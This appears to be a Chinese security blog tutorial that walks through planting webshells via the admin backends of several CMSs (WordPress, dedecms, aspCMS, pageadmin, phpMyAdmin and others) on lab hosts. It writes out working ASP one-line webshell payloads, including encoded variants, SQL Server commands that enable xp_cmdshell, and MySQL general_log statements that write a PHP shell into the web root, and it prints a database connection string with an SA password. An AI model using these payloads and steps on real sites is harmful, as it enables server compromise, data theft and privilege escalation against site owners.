各种cms getshell技巧
文章目录
- 概述
-
- getshell 方法大概分类
-
- 模板编辑拿 webshell
- 文件上传拿 webshell
- 文件写入拿 webshell
- zip自解压拿 webshell
- 远程图片下载拿 webshell
- 编辑器漏洞拿 webshell
- 备份拿 webshell
- SQL语句执行拿 webshell
- SQL注入写shell 拿 webshell
- CMS 后台getshell复现
-
- wordpress CMS
-
- 1.wordpress后台修改模板getshell
- 2.wordpress上传主题getshell
- dedecms (织梦CMS)
-
- 1.dedecms通过文件管理器上传getshell
- dedecms修改模块文件getshell
- dedecms 后台任意命令执行getshell
- aspCMS
-
- aspcms后台修改配置文件getshell
- 南方数据CMS
-
- 后台上传截断getshell
- 一句话插入配置文件getshell
- pageadmin CMS
-
- 上传模块getshell
- 上传文件解压getshell
- 查找数据库配置文件 sql server执行命令getshell
- 无忧企业
-
- access数据库为asp格式getshell
- phpmyadmin
-
- 日志getshell
概述
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上
传网页后门,获取网站的webshell
webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑,
删除,上传或者下载,查看文件。
攻击者也可以通过这个webshell对服务器进行提权,提权成功后,会得到服务器管理权限。拿webshell
也是getshell的另一种叫法
getshell 方法大概分类
模板编辑拿 webshell
通过修改模块写入一句话,网站再调用模板的时,会自动加载这个模板,运行后门。
文件上传拿 webshell
通过后台的上传模块,上传网页后门,就可以拿到webshell
文件写入拿 webshell
通过可控参数将恶意代码写入文件里,即可获取webshell
zip自解压拿 webshell
上传zip文件,在其加入webshell文件,程序会自动解压,将后门解压到网站目录,可以获取webshell。
远程图片下载拿 webshell
有的网站后台会存在远程图片下载功能,但是没有对其后缀名进行限制,导致可以下去webshell文件。
编辑器漏洞拿 webshell
有的编辑器存在上传漏洞,通过编辑器漏洞可以获取网站的webshell。
备份拿 webshell
很多的asp网站 都存在备份功能,上传有恶意的图片,备份成脚本文件,即可获取webshell
SQL语句执行拿 webshell
有的网站存在sql执行命令,可以通过命令备份或导出一句话后门到指定网站目录,即可获取webshell
SQL注入写shell 拿 webshell
网站前台设置了防注入,但是后台一般都存在注入,如果权限有读写,使用命令进行读写文件,或者执
行写入后门,即可获取webshell
CMS 后台getshell复现
wordpress CMS
1.wordpress后台修改模板getshell
wordpress 默认后台地址
/wp-login.php
在后台中的外观中,编辑404模板插入一句话webshell,并且保存。
我们在自己搭的环境中查看一下模板文件存放的地址
将地址拼接起来,可以得到
http://www.cbi1.com/wp-content/themes/twentysixteen/404.php
一般情况下,模板的地址是不会变动的只需要根据不同的模板名字进行变动就行了。
直接访问,和使用蚁剑进行连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q4pdrxrR-1657252892491)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252356833.png)]
2.wordpress上传主题getshell
在wordpress中有一个上传主题的zip文件这个功能,我们可以在测试机器上面下载一个主题把webshell加在里面压缩上传后进行解压
这样显示安装成功
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C3AqEp6c-1657252892492)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252415503.png)]
查看一下文件路径,并进行拼接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5YK37AET-1657252892493)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252424068.png)]
获得路径
http://www.cbi1.com/wp-content/themes/lianqing/webshell.php
直接访问,和使用蚁剑进行连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-26mav8Ba-1657252892493)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252439748.png)]
dedecms (织梦CMS)
dedecms 后台默认地址为:
http://www.cbi2.com/dede/login.php
1.dedecms通过文件管理器上传getshell
拼接地址为:
http://www.cbi2.com/uploads/webshell.php
直接访问以及蚁剑连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mG28jur0-1657252892495)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252478758.png)]
dedecms修改模块文件getshell
在模板页面修改index.htm的模板在其中插入一句话
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uMSio1TJ-1657252892496)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252492859.png)]
修改模板后来到生成 设置生成的主页格式
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lGlb9Cmr-1657252892496)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252501804.png)]
直接访问网页和webshell上线
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B7UDwG2R-1657252892497)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252510148.png)]
dedecms 后台任意命令执行getshell
在dedecms后台广告管理,可以插入php任意代码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JACaGunw-1657252892498)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252529553.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bpdS8Sfn-1657252892498)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252537836.png)]
访问 即可获取webshell
http://www.cbi2.com/plus/ad_js.php?aid=7
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NT9ljCUc-1657252892499)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252549003.png)]
aspCMS
默认后台路径:
/admin_aspcms/login.asp
aspcms后台修改配置文件getshell
网站中的配置文件,如果可在后台里进行修改,如果没有任何过滤,可以在里面写入而已的语句,即可
获取webshell。
Tips:注意闭合问题,因为配置文件在网站中是全局调用,如果写错,网站会错误。无法访问。
在aspcms可以修改 如果是字符类型填写双引号闭合 如果是数字
"%><%eval request(chr(35))%><%
%><%eval request(chr(35))%><%
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-spht4MNn-1657252892499)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252562020.png)]
这个程序是有特殊符号转义的,所以我们的一句话需要进行编码
%25><%25Eval(Request (chr(65)))%25><%25 # 密码是a
可以看到一句话已经成功插入进去了
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nZFYEKd9-1657252892499)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252571093.png)]
我们尝试连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XvJTWlsD-1657252892500)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252579471.png)]
南方数据CMS
默认后台登录地址:
/admin/Login.asp
后台上传截断getshell
http://www.cbi7.com/admin/UpFileForm.asp?Result=QRCodeo
在上面的地址中存在一个上传截断,burp抓包修改
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-j8XYccmP-1657252892500)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252589424.png)]
蚁剑测试
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uxJfl5v2-1657252892500)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252597483.png)]
一句话插入配置文件getshell
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e04P1UYI-1657252892501)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252606201.png)]
配置文件地址:
http://www.cbi7.com//Inc/Const.asp
蚁剑连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xUb2gjFZ-1657252892501)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252615441.png)]
pageadmin CMS
默认后台登录地址:
/admin/login/
上传模块getshell
在模板安装中上传压缩的webshell,进行安装
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SJwksQih-1657252892502)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252625238.png)]
上传zip文件上后系统会自动解压
Templates/webshell/webshell.aspx
拼接路径连接webshell
http://www.cbi9.com/Templates/webshell/webshell.aspx
蚁剑连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EwPnPZWr-1657252892502)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252632503.png)]
上传文件解压getshell
有的网站存在上传压缩包然后解压的功能,我们可以利用这个功能进行getshell
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-d4fN1j84-1657252892502)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252641931.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Bj43oWt6-1657252892503)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252651664.png)]
拼接路径
http://www.cbi9.com/webshell.aspx
蚁剑连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8YDzb26V-1657252892504)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252663327.png)]
查找数据库配置文件 sql server执行命令getshell
能够查看到数据库的配置文件,可以利用数据库的命令执行模块来执行命令写入webshell或者反弹shell,有的时候可能会有意外惊喜
有点网站是站库分离的可能意外的打到其他服务器。
Tips:一般情况下 SQL SERVER的默认权限都是比较大的能够执行命令,MySQL 的权限一般都比较小无法执行命令
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zgw0TBlk-1657252892504)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252678000.png)]
ping 一下域名得到ip地址使用蚁剑尝试连接一下
Driver=sql server;Server=192.168.150.147;Database=cbi9;Uid=SA;Pwd=_H6psv8Fmr2C7mvsF6qkGnE
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pp6cA7UP-1657252892504)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252685374.png)]
先开启xp_cmdshell
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
使用 EXEC xp_cmdshell ‘’ 执行命令
同样也可以使用 sql server 读写操作 写入webshell
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XXheSGQh-1657252892505)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252696206.png)]
无忧企业
默认后台地址
/admin/Login.asp
access数据库为asp格式getshell
如果access数据库是asp格式的可以插入数据库一句话访问数据库即可获取webshell
留言插入
┼攠數畣整爠煥敵瑳∨≡┩愾 # 密码a
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H5fBLfWV-1657252892505)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252705827.png)]
url 遇到#会当作瞄点 所以要将#url编码后在进行访问。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8DLcFIRz-1657252892506)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252713472.png)]
访问url,使用蚁剑连接
http://www.cbi18.com/Databases/%25%23%40%24%40%23%46%44%53%40%23%24%25%25%23.asp
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qo6cVGNy-1657252892506)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252721654.png)]
phpmyadmin
日志getshell
利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改
这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell
条件限制:
-
知道网站的绝对路径
在phpmyadmin中的变量中可能泄露绝对路径
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8qqBST6-1657252892506)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252734969.png)]
在Linux中,一般情况为 /var/www/html
在Windows 中需要自己通过泄露的路径或者其他方法得到网站的绝对路径
这里可以看到网站是使用 phpstudy_pro 搭建的,那我们猜测一下绝对为:
C:\phpstudy_pro\WWW\phpMyAdmin4.8.5\
开启日志记录
SET global general_log = "ON"; # 日志保存状态开启;
SET global general_log_file ='C:\phpstudy_pro\WWW\phpMyAdmin4.8.5\a.php'; # 修改日志的保存位置。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2hPwUxmr-1657252892507)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252749124.png)]
执行成功后直接select 进行查询写入webshell
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EM6RDUHP-1657252892507)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252815900.png)]
有的时候sql会修改不成功,可以去变量哪手动修改
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QQEeCgT3-1657252892507)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252831276.png)]
我们直接访问和使用蚁剑进行连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GSZGpk7E-1657252892508)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252842592.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-msvPZu4c-1657252892508)(http://www.lianqing.xyz/wp-content/uploads/2022/07/image-1657252850006.png)]